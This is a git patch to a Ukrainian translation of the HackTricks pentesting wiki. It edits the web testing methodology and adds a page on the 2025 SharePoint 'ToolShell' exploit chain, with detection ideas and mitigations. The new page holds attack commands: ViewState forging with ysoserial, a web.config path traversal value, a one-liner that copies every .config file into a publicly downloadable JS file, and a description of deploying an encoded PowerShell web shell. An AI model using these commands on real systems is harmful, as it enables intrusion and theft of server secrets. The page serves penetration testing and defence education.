From c21d78595157ad5fbc913e9fd1d6e500e0cf09bd Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 22 Jul 2025 14:15:49 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-web/README.md', --- src/SUMMARY.md | 1 + .../pentesting-web/README.md | 81 +++++------ .../pentesting-web/microsoft-sharepoint.md | 126 ++++++++++++++++++ 3 files changed, 168 insertions(+), 40 deletions(-) create mode 100644 src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 09ba11160..088f962ff 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -423,6 +423,7 @@ - [Joomla](network-services-pentesting/pentesting-web/joomla.md) - [JSP](network-services-pentesting/pentesting-web/jsp.md) - [Laravel](network-services-pentesting/pentesting-web/laravel.md) + - [Microsoft Sharepoint](network-services-pentesting/pentesting-web/microsoft-sharepoint.md) - [Moodle](network-services-pentesting/pentesting-web/moodle.md) - [NextJS](network-services-pentesting/pentesting-web/nextjs.md) - [Nginx](network-services-pentesting/pentesting-web/nginx.md) diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md index 34d344289..835e23652 100644 --- a/src/network-services-pentesting/pentesting-web/README.md +++ b/src/network-services-pentesting/pentesting-web/README.md @@ -2,11 +2,11 @@ {{#include ../../banners/hacktricks-training.md}} -## Основна інформація +## Basic Info Веб-сервіс є найпоширенішим та найобширнішим сервісом, і існує багато різних типів вразливостей. -**Порт за замовчуванням:** 80 (HTTP), 443(HTTPS) +**Default port:** 80 (HTTP), 443(HTTPS) ```bash PORT STATE SERVICE 80/tcp open http @@ -25,18 +25,18 @@ web-api-pentesting.md ## Методологія -> У цій методології ми будемо припускати, що ви збираєтеся атакувати домен (або піддомен) і тільки його. Тому ви повинні застосувати цю методологію до кожного виявленого домену, піддомену або IP з невизначеним веб-сервером у межах обсягу. +> У цій методології ми будемо припускати, що ви будете атакувати домен (або піддомен) і тільки його. Тому ви повинні застосовувати цю методологію до кожного виявленого домену, піддомену або IP з невизначеним веб-сервером у межах обсягу. - [ ] Почніть з **ідентифікації** **технологій**, що використовуються веб-сервером. Шукайте **поради**, які слід пам'ятати під час решти тесту, якщо вам вдасться успішно ідентифікувати технологію. - [ ] Чи є якісь **відомі вразливості** версії технології? - [ ] Використовується якась **відомо технологія**? Якась **корисна порада** для отримання додаткової інформації? - [ ] Чи є якийсь **спеціалізований сканер** для запуску (наприклад, wpscan)? -- [ ] Запустіть **сканери загального призначення**. Ви ніколи не знаєте, чи знайдуть вони щось або чи знайдуть якусь цікаву інформацію. +- [ ] Запустіть **сканери загального призначення**. Ви ніколи не знаєте, чи знайдуть вони щось цікаве. - [ ] Розпочніть з **початкових перевірок**: **robots**, **sitemap**, **404** помилка та **сканування SSL/TLS** (якщо HTTPS). - [ ] Розпочніть **павукоподібне сканування** веб-сторінки: час **знайти** всі можливі **файли, папки** та **параметри, що використовуються.** Також перевірте на **особливі знахідки**. -- [ ] _Зверніть увагу, що щоразу, коли під час брутфорсингу або павукоподібного сканування виявляється новий каталог, його слід просканувати._ -- [ ] **Брутфорсинг каталогів**: спробуйте брутфорсити всі виявлені папки в пошуках нових **файлів** та **каталогів**. -- [ ] _Зверніть увагу, що щоразу, коли під час брутфорсингу або павукоподібного сканування виявляється новий каталог, його слід брутфорсити._ +- [ ] _Зверніть увагу, що кожного разу, коли під час брутфорсингу або павукоподібного сканування виявляється новий каталог, його слід просканувати._ +- [ ] **Брутфорсинг каталогів**: спробуйте брутфорсити всі виявлені папки, шукаючи нові **файли** та **каталоги**. +- [ ] _Зверніть увагу, що кожного разу, коли під час брутфорсингу або павукоподібного сканування виявляється новий каталог, його слід брутфорсити._ - [ ] **Перевірка резервних копій**: перевірте, чи можете ви знайти **резервні копії** **виявлених файлів**, додаючи загальні розширення резервних копій. - [ ] **Брутфорсинг параметрів**: спробуйте **знайти приховані параметри**. - [ ] Як тільки ви **ідентифікували** всі можливі **кінцеві точки**, що приймають **введення користувача**, перевірте на всі види **вразливостей**, пов'язаних з цим. @@ -64,7 +64,7 @@ Search **for** [**вразливості веб-додатку** **версії* ### Трюки веб-технологій -Декілька **трюків** для **пошуку вразливостей** у різних відомих **технологіях**: +Деякі **трюки** для **пошуку вразливостей** у різних відомих **технологіях**: - [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md) - [**Apache**](apache.md) @@ -78,6 +78,7 @@ Search **for** [**вразливості веб-додатку** **версії* - [**GraphQL**](graphql.md) - [**H2 - Java SQL database**](h2-java-sql-database.md) - [**IIS tricks**](iis-internet-information-services.md) +- [**Microsoft SharePoint**](microsoft-sharepoint.md) - [**JBOSS**](jboss.md) - [**Jenkins**](<[https:/github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/pentesting-web/broken-reference/README.md](https:/github.com/HackTricks-wiki/hacktricks-cloud/tree/master/pentesting-ci-cd/jenkins-security)/>) - [**Jira**](jira.md) @@ -103,14 +104,14 @@ _Зверніть увагу, що **один і той же домен** мож ### Огляд вихідного коду -Якщо **вихідний код** програми доступний на **github**, окрім проведення **вашого власного тесту White box** програми, є **деяка інформація**, яка може бути **корисною** для поточного **Black-Box тестування**: +Якщо **вихідний код** програми доступний на **github**, окрім виконання **вашого власного тесту White box** програми, є **деяка інформація**, яка може бути **корисною** для поточного **Black-Box тестування**: - Чи є **Change-log або Readme або Version** файл або щось з **інформацією про версію, доступною** через веб? - Як і де зберігаються **облікові дані**? Чи є якийсь (доступний?) **файл** з обліковими даними (іменами користувачів або паролями)? - Чи є **паролі** у **звичайному тексті**, **зашифровані** або який **алгоритм хешування** використовується? - Чи використовується якийсь **майстер-ключ** для шифрування чогось? Який **алгоритм** використовується? - Чи можете ви **отримати доступ до будь-яких з цих файлів**, експлуатуючи якусь вразливість? -- Чи є якась **цікава інформація на github** (вирішені та не вирішені) **проблеми**? Або в **історії комітів** (можливо, якийсь **пароль, введений у старому коміті**)? +- Чи є якась **цікава інформація в github** (вирішені та не вирішені) **проблеми**? Або в **історії комітів** (можливо, якийсь **пароль, введений у старому коміті**)? {{#ref}} code-review-tools.md @@ -145,7 +146,7 @@ wpscan --force update -e --url joomscan --ec -u joomlavs.rb #https://github.com/rastating/joomlavs ``` -> На цьому етапі ви вже повинні мати деяку інформацію про веб-сервер, що використовується клієнтом (якщо надані дані) та деякі хитрощі, які слід пам'ятати під час тестування. Якщо вам пощастить, ви навіть знайшли CMS і запустили сканер. +> На цьому етапі ви вже повинні мати деяку інформацію про веб-сервер, який використовується клієнтом (якщо надані дані) та деякі хитрощі, які слід пам'ятати під час тестування. Якщо вам пощастить, ви навіть знайшли CMS і запустили сканер. ## Покрокове виявлення веб-додатків @@ -162,13 +163,13 @@ joomlavs.rb #https://github.com/rastating/joomlavs - /.well-known/ - Також перевірте коментарі на основних та вторинних сторінках. -**Примус помилок** +**Силове викликання помилок** Веб-сервери можуть **поводитися несподівано**, коли їм надсилаються дивні дані. Це може відкрити **вразливості** або **розкрити чутливу інформацію**. -- Доступ до **фейкових сторінок** на кшталт /whatever_fake.php (.aspx,.html,.тощо) -- **Додайте "\[]", "]]" та "\[\["** у **значеннях cookie** та **значеннях параметрів**, щоб створити помилки -- Генеруйте помилку, вводячи **`/~randomthing/%s`** в **кінці** **URL** +- Доступ до **фальшивих сторінок** на кшталт /whatever_fake.php (.aspx,.html,.тощо) +- **Додайте "\[]", "]]" та "\[\["** у **значення cookie** та **значення параметрів**, щоб створити помилки +- Генеруйте помилку, надаючи вхідні дані у вигляді **`/~randomthing/%s`** в **кінці** **URL** - Спробуйте **різні HTTP методи** такі як PATCH, DEBUG або неправильні, як FAKE #### **Перевірте, чи можете ви завантажувати файли (**[**PUT verb, WebDav**](put-method-webdav.md)**)** @@ -180,10 +181,10 @@ joomlavs.rb #https://github.com/rastating/joomlavs ### **Вразливості SSL/TLS** -- Якщо додаток **не примушує користувача використовувати HTTPS** в жодній частині, то він **вразливий до MitM** +- Якщо додаток **не змушує користувача використовувати HTTPS** в будь-якій частині, то він **вразливий до MitM** - Якщо додаток **надсилає чутливі дані (паролі) за допомогою HTTP**. Тоді це висока вразливість. -Використовуйте [**testssl.sh**](https://github.com/drwetter/testssl.sh) для перевірки **вразливостей** (в програмах Bug Bounty, ймовірно, такі вразливості не будуть прийняті) та використовуйте [**a2sv**](https://github.com/hahwul/a2sv) для повторної перевірки вразливостей: +Використовуйте [**testssl.sh**](https://github.com/drwetter/testssl.sh) для перевірки **вразливостей** (в програмах Bug Bounty, ймовірно, такі вразливості не будуть прийняті) і використовуйте [**a2sv**](https://github.com/hahwul/a2sv) для повторної перевірки вразливостей: ```bash ./testssl.sh [--htmlfile] 10.10.10.10:443 #Use the --htmlfile to save the output inside an htmlfile also @@ -207,31 +208,31 @@ sslyze --regular - [**evine** ](https://github.com/saeeddhqan/evine)(go): Інтерактивний CLI HTML spider. Він також шукає в Archive.org. - [**meg**](https://github.com/tomnomnom/meg) (go): Цей інструмент не є spider'ом, але може бути корисним. Ви можете просто вказати файл з хостами та файл з шляхами, і meg отримає кожен шлях на кожному хості та збере відповідь. - [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider з можливостями рендерингу JS. Однак, виглядає так, що він не підтримується, попередньо скомпільована версія стара, а поточний код не компілюється. -- [**gau**](https://github.com/lc/gau) (go): HTML spider, який використовує зовнішніх постачальників (wayback, otx, commoncrawl). +- [**gau**](https://github.com/lc/gau) (go): HTML spider, який використовує зовнішні постачальники (wayback, otx, commoncrawl). - [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): Цей скрипт знайде URL з параметрами та виведе їх. - [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider з можливостями рендерингу JS. - [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, з можливостями beautify для JS, здатний шукати нові шляхи в JS файлах. Також варто звернути увагу на [JSScanner](https://github.com/dark-warlord14/JSScanner), який є обгорткою для LinkFinder. -- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): Для витягування кінцевих точок як з HTML джерела, так і з вбудованих javascript файлів. Корисно для шукачів помилок, червоних команд, інфосек ніндзя. +- [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): Для витягування кінцевих точок як з HTML джерела, так і з вбудованих javascript файлів. Корисно для шукачів вразливостей, червоних команд, інфосек ніндзя. - [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): Скрипт python 2.7, що використовує Tornado та JSBeautifier для парсингу відносних URL з JavaScript файлів. Корисно для легкого виявлення AJAX запитів. Виглядає так, що не підтримується. - [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Даний файл (HTML) витягне URL з нього, використовуючи хитрі регулярні вирази для знаходження та витягування відносних URL з непривабливих (мінімізованих) файлів. - [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, кілька інструментів): Збирає цікаву інформацію з JS файлів, використовуючи кілька інструментів. -- [**subjs**](https://github.com/lc/subjs) (go): Знайти JS файли. -- [**page-fetch**](https://github.com/detectify/page-fetch) (go): Завантажити сторінку в безголовому браузері та вивести всі URL, завантажені для завантаження сторінки. -- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Інструмент для виявлення вмісту, що поєднує кілька опцій попередніх інструментів. +- [**subjs**](https://github.com/lc/subjs) (go): Знаходить JS файли. +- [**page-fetch**](https://github.com/detectify/page-fetch) (go): Завантажує сторінку в безголовому браузері та виводить всі URL, завантажені для завантаження сторінки. +- [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Інструмент для виявлення контенту, що поєднує кілька опцій попередніх інструментів. - [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): Розширення Burp для знаходження шляхів та параметрів у JS файлах. - [**Sourcemapper**](https://github.com/denandz/sourcemapper): Інструмент, який, отримавши URL .js.map, надасть вам beautified JS код. -- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): Це інструмент, що використовується для виявлення кінцевих точок для заданої цілі. +- [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): Цей інструмент використовується для виявлення кінцевих точок для заданої цілі. - [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Виявляє посилання з wayback machine (також завантажуючи відповіді в wayback та шукаючи більше посилань). -- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Краулінг (навіть заповнюючи форми) та також знаходження чутливої інформації, використовуючи специфічні regex. -- [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite - це розширений багатофункціональний GUI веб-безпековий краулер/spider, розроблений для фахівців з кібербезпеки. +- [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Краулінг (навіть заповнюючи форми) та також знаходить чутливу інформацію, використовуючи специфічні regex. +- [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite - це просунутий багатофункціональний GUI веб-безпековий краулер/spider, розроблений для фахівців з кібербезпеки. - [**jsluice**](https://github.com/BishopFox/jsluice) (go): Це пакет Go та [інструмент командного рядка](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) для витягування URL, шляхів, секретів та інших цікавих даних з вихідного коду JavaScript. - [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge - це просте **розширення Burp Suite** для **витягування параметрів та кінцевих точок** з запиту для створення користувацького списку слів для фуззингу та перерахунку. - [**katana**](https://github.com/projectdiscovery/katana) (go): Чудовий інструмент для цього. - [**Crawley**](https://github.com/s0rg/crawley) (go): Друкує кожне посилання, яке може знайти. -### Brute Force каталоги та файли +### Brute Force директорій та файлів -Почніть **brute-forcing** з кореневої папки та переконайтеся, що ви brute-force **всі** **знайдені каталоги**, використовуючи **цей метод** та всі каталоги, **виявлені** за допомогою **Spidering** (ви можете виконати цей brute-forcing **рекурсивно** та додати на початку використаного списку слів назви знайдених каталогів).\ +Почніть **brute-forcing** з кореневої папки та переконайтеся, що ви brute-force **всі** **знайдені директорії**, використовуючи **цей метод** та всі директорії, **виявлені** за допомогою **Spidering** (ви можете виконати цей brute-forcing **рекурсивно** та додати на початку використаного списку слів назви знайдених директорій).\ Інструменти: - **Dirb** / **Dirbuster** - Включено в Kali, **старий** (і **повільний**), але функціональний. Дозволяє авто-підписані сертифікати та рекурсивний пошук. Занадто повільний у порівнянні з іншими варіантами. @@ -241,7 +242,7 @@ sslyze --regular - [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ` - [**ffuf** ](https://github.com/ffuf/ffuf)- Швидкий: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ` - [**uro**](https://github.com/s0md3v/uro) (python): Це не spider, а інструмент, який, отримавши список знайдених URL, видалить "дубльовані" URL. -- [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Розширення Burp для створення списку каталогів з історії burp різних сторінок. +- [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Розширення Burp для створення списку директорій з історії burp різних сторінок. - [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Видаляє URL з дублікатами функціональностей (на основі js імпортів). - [**Chamaleon**](https://github.com/iustin24/chameleon): Використовує wapalyzer для виявлення використовуваних технологій та вибору списків слів для використання. @@ -264,20 +265,20 @@ sslyze --regular - _/usr/share/wordlists/dirb/big.txt_ - _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_ -_Зверніть увагу, що щоразу, коли під час brute-forcing або spidering виявляється новий каталог, його слід brute-force._ +_Зверніть увагу, що щоразу, коли під час brute-forcing або spidering виявляється нова директорія, її слід Brute-Forced._ ### Що перевірити в кожному знайденому файлі - [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Знайти зламані посилання всередині HTML, які можуть бути схильні до захоплення. - **Резервні копії файлів**: Після того, як ви знайшли всі файли, шукайте резервні копії всіх виконуваних файлів ("_.php_", "_.aspx_"...). Загальні варіації для назви резервної копії: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp та file.old._ Ви також можете використовувати інструмент [**bfac**](https://github.com/mazen160/bfac) **або** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.** - **Виявлення нових параметрів**: Ви можете використовувати інструменти, такі як [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **та** [**Param Miner**](https://github.com/PortSwigger/param-miner) **для виявлення прихованих параметрів. Якщо зможете, спробуйте шукати** приховані параметри в кожному виконуваному веб-файлі. -- _Arjun всі стандартні словники:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db) +- _Arjun всі стандартні списки слів:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db) - _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params) - _Assetnote “parameters_top_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io) - _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773) - **Коментарі:** Перевірте коментарі всіх файлів, ви можете знайти **облікові дані** або **приховану функціональність**. - Якщо ви граєте в **CTF**, "звичайний" трюк - це **сховати** **інформацію** всередині коментарів праворуч від **сторінки** (використовуючи **сотні** **пробілів**, щоб ви не бачили дані, якщо відкриєте вихідний код у браузері). Інша можливість - використовувати **кілька нових рядків** та **сховати інформацію** в коментарі в **нижній частині** веб-сторінки. -- **API ключі**: Якщо ви **знайдете будь-який API ключ**, є посібник, який вказує, як використовувати API ключі різних платформ: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**]()**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird). +- **API ключі**: Якщо ви **знайдете будь-який API ключ**, є посібник, який вказує, як використовувати API ключі різних платформ: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**]()**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird) - Google API ключі: Якщо ви знайдете будь-який API ключ, що виглядає як **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik, ви можете використовувати проект [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner), щоб перевірити, до яких API ключ може отримати доступ. - **S3 Buckets**: Під час spidering перевірте, чи є якийсь **субдомен** або будь-яке **посилання**, пов'язане з якимось **S3 bucket**. У такому випадку, [**перевірте** **дозволи** на bucket](buckets/index.html). @@ -288,19 +289,19 @@ _Зверніть увагу, що щоразу, коли під час brute-fo **Цікаві файли** - Шукайте **посилання** на інші файли всередині **CSS** файлів. -- [Якщо ви знайдете файл _**.git**_, з нього можна витягти деяку інформацію](git.md). +- [Якщо ви знайдете файл _**.git**_, можна витягнути деяку інформацію](git.md) - Якщо ви знайдете _**.env**_, можна знайти інформацію, таку як API ключі, паролі бази даних та іншу інформацію. - Якщо ви знайдете **API кінцеві точки**, ви [також повинні їх протестувати](web-api-pentesting.md). Це не файли, але, ймовірно, "виглядатимуть" як вони. - **JS файли**: У розділі spidering згадувалися кілька інструментів, які можуть витягувати шляхи з JS файлів. Також було б цікаво **моніторити кожен знайдений JS файл**, оскільки в деяких випадках зміна може вказувати на те, що потенційна вразливість була введена в код. Ви можете використовувати, наприклад, [**JSMon**](https://github.com/robre/jsmon)**.** - Вам також слід перевірити виявлені JS файли за допомогою [**RetireJS**](https://github.com/retirejs/retire.js/) або [**JSHole**](https://github.com/callforpapers-source/jshole), щоб дізнатися, чи є вони вразливими. -- **Javascript Deobfuscator та Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator). -- **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org). -- **JsFuck deobfuscation** (javascript з символами:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/)). +- **Javascript Deobfuscator і Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator) +- **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org) +- **JsFuck deobfuscation** (javascript з символами:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/)) - [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.` -- У кількох випадках вам потрібно буде **зрозуміти регулярні вирази**, що використовуються. Це буде корисно: [https://regex101.com/](https://regex101.com) або [https://pythonium.net/regex](https://pythonium.net/regex). +- У кількох випадках вам потрібно буде **зрозуміти регулярні вирази**, що використовуються. Це буде корисно: [https://regex101.com/](https://regex101.com) або [https://pythonium.net/regex](https://pythonium.net/regex) - Ви також можете **моніторити файли, в яких були виявлені форми**, оскільки зміна параметра або поява нової форми може вказувати на потенційно нову вразливу функціональність. -**403 Forbidden/Basic Authentication/401 Unauthorized (bypass)** +**403 Forbidden/Basic Authentication/401 Unauthorized (обхід)** {{#ref}} 403-and-401-bypasses.md @@ -310,15 +311,15 @@ _Зверніть увагу, що щоразу, коли під час brute-fo Якщо будь-яка сторінка **відповідає** з цим **кодом**, це, ймовірно, **погано налаштований проксі**. **Якщо ви надішлете HTTP запит, наприклад: `GET https://google.com HTTP/1.1`** (з заголовком хоста та іншими загальними заголовками), **проксі** спробує **доступитися** до _**google.com**_ **і ви знайдете** SSRF. -**NTLM Authentication - Інформаційний витік** +**NTLM Authentication - Розкриття інформації** -Якщо працюючий сервер запитує аутентифікацію **Windows** або ви знаходите вхід, що запитує ваші **облікові дані** (і запитує **ім'я домену**), ви можете спровокувати **витік інформації**.\ +Якщо працюючий сервер запитує аутентифікацію, це **Windows** або ви знаходите вхід, що запитує ваші **облікові дані** (і запитує **ім'я** **домену**), ви можете спровокувати **розкриття інформації**.\ **Надішліть** **заголовок**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` і через те, як працює **NTLM аутентифікація**, сервер відповість внутрішньою інформацією (версія IIS, версія Windows...) у заголовку "WWW-Authenticate".\ Ви можете **автоматизувати** це, використовуючи **плагін nmap** "_http-ntlm-info.nse_". **HTTP Redirect (CTF)** -Можливо **вставити вміст** всередину **перенаправлення**. Цей вміст **не буде показаний користувачу** (оскільки браузер виконає перенаправлення), але щось може бути **сховане** там. +Можливо **вставити контент** всередині **Redirection**. Цей контент **не буде показаний користувачу** (оскільки браузер виконає перенаправлення), але щось може бути **сховане** там. ### Перевірка веб-вразливостей diff --git a/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md b/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md new file mode 100644 index 000000000..7c805369b --- /dev/null +++ b/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md @@ -0,0 +1,126 @@ +# Microsoft SharePoint – Pentesting & Exploitation + +{{#include ../../banners/hacktricks-training.md}} + +> Microsoft SharePoint (on-premises) побудований на основі ASP.NET/IIS. Більшість класичної веб-атакуючої поверхні (ViewState, Web.Config, веб-оболонки тощо) тому присутня, але SharePoint також постачається з сотнями власних сторінок ASPX та веб-сервісів, які значно розширюють відкриту атакуючу поверхню. Ця сторінка збирає практичні трюки для перерахунку, експлуатації та збереження в середовищах SharePoint з акцентом на ланцюг експлуатації 2025 року, розкритий Unit42 (CVE-2025-49704/49706/53770/53771). + +## 1. Quick enumeration +``` +# favicon hash and keywords +curl -s https:///_layouts/15/images/SharePointHome.png +curl -s https:///_vti_bin/client.svc | file - # returns WCF/XSI + +# version leakage (often in JS) +curl -s https:///_layouts/15/init.js | grep -i "spPageContextInfo" + +# interesting standard paths +/_layouts/15/ToolPane.aspx # vulnerable page used in 2025 exploit chain +/_vti_bin/Lists.asmx # legacy SOAP service +/_catalogs/masterpage/Forms/AllItems.aspx + +# enumerate sites & site-collections (requires at least Anonymous) +python3 Office365-ADFSBrute/SharePointURLBrute.py -u https:// +``` +## 2. 2025 експлойт ланцюг (також відомий як “ToolShell”) + +### 2.1 CVE-2025-49704 – Впровадження коду на ToolPane.aspx + +`/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=` дозволяє впроваджувати довільний *Server-Side Include* код на сторінку, який пізніше компілюється ASP.NET. Зловмисник може вбудувати C#, який виконує `Process.Start()` і скинути шкідливий ViewState. + +### 2.2 CVE-2025-49706 – Неправильне обхід аутентифікації + +Та сама сторінка довіряє заголовку **X-Forms_BaseUrl** для визначення контексту сайту. Вказавши його на `/_layouts/15/`, MFA/SSO, що застосовується на кореневому сайті, може бути обійдено **без аутентифікації**. + +### 2.3 CVE-2025-53770 – Десеріалізація ViewState без аутентифікації → RCE + +Якщо зловмисник контролює гаджет у `ToolPane.aspx`, він може надіслати **незавірене** (або тільки з MAC) значення `__VIEWSTATE`, яке викликає десеріалізацію .NET всередині *w3wp.exe*, що призводить до виконання коду. + +Якщо підписування увімкнено, вкрадіть **ValidationKey/DecryptionKey** з будь-якого `web.config` (див. 2.4) і підробіть payload за допомогою *ysoserial.net* або *ysodom*: +``` +ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" | +ViewStateGenerator.exe --validation-key --decryption-key -o payload.txt +``` +Для детального пояснення зловживання ASP.NET ViewState читайте: +{{#ref}} +../../pentesting-web/deserialization/exploiting-__viewstate-parameter.md +{{#endref}} + +### 2.4 CVE-2025-53771 – Перехід по шляху / розкриття web.config + +Відправка підготовленого параметра `Source` до `ToolPane.aspx` (наприклад, `../../../../web.config`) повертає цільовий файл, що дозволяє витік: + +* `` ➜ підробка ViewState / ASPXAUTH cookies +* рядки підключення та секрети. + +## 3. Рецепти пост-експлуатації, спостережені в природі + +### 3.1 Витягти кожен *.config* файл (варіант-1) +``` +cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js" +``` +Отриманий `debug_dev.js` можна завантажити анонімно і він містить **всі** чутливі конфігурації. + +### 3.2 Розгорніть ASPX веб-оболонку, закодовану в Base64 (варіант-2) +``` +powershell.exe -EncodedCommand +``` +Приклад декодованого корисного навантаження (скорочений): +```csharp +<%@ Page Language="C#" %> +<%@ Import Namespace="System.Security.Cryptography" %> + +``` +Написано для: +``` +C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx +``` +Шелл відкриває кінцеві точки для **читання / обертання ключів машини**, що дозволяє підробляти ViewState та ASPXAUTH куки по всій фермі. + +### 3.3 Обфускований варіант (варіація-3) + +Той самий шелл, але: +* розміщений під `...\15\TEMPLATE\LAYOUTS\` +* імена змінних зменшені до одиничних літер +* `Thread.Sleep()` додано для обходу пісочниці та обману на основі часу. + +## 4. Ідеї для виявлення + +| Телеметрія | Чому це підозріло | +|-----------|----------------------| +| `w3wp.exe → cmd.exe` | Процес робітника рідко повинен запускати шелл | +| `cmd.exe → powershell.exe -EncodedCommand` | Класичний шаблон lolbin | +| Події файлів, що створюють `debug_dev.js` або `spinstall0.aspx` | IOCs прямо з ToolShell | +| `ProcessCmdLine CONTAINS ToolPane.aspx` (ETW/Module logs) | Публічні PoCs викликають цю сторінку | + +Приклад правила XDR / Sysmon (псевдо-XQL): +``` +proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powershell.exe") +``` +## 5. Укріплення та пом'якшення + +1. **Патч** – Оновлення безпеки за липень 2025 року виправляють *всі* чотири CVE. +2. **Змінюйте** кожен `` та `ViewState` секрети після компрометації. +3. Видаліть *LAYOUTS* права на запис з груп `WSS_WPG` та `WSS_ADMIN_WPG`. +4. Блокуйте зовнішній доступ до `/_layouts/15/ToolPane.aspx` на рівні проксі/WAF. +5. Увімкніть **ViewStateUserKey**, **MAC enabled** та користувацький *EventValidation*. + +## Супутні трюки + +* IIS пост-компрометація та зловживання web.config: +{{#ref}} +../../network-services-pentesting/pentesting-web/iis-internet-information-services.md +{{#endref}} + +## Посилання + +- [Unit42 – Активна експлуатація вразливостей Microsoft SharePoint](https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/) +- [GitHub PoC – Ланцюг експлуатації ToolShell](https://github.com/real-or-not/ToolShell) +- [Microsoft Security Advisory – CVE-2025-49704 / 49706](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-49704) +- [Microsoft Security Advisory – CVE-2025-53770 / 53771](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-53770) + +{{#include ../../banners/hacktricks-training.md}}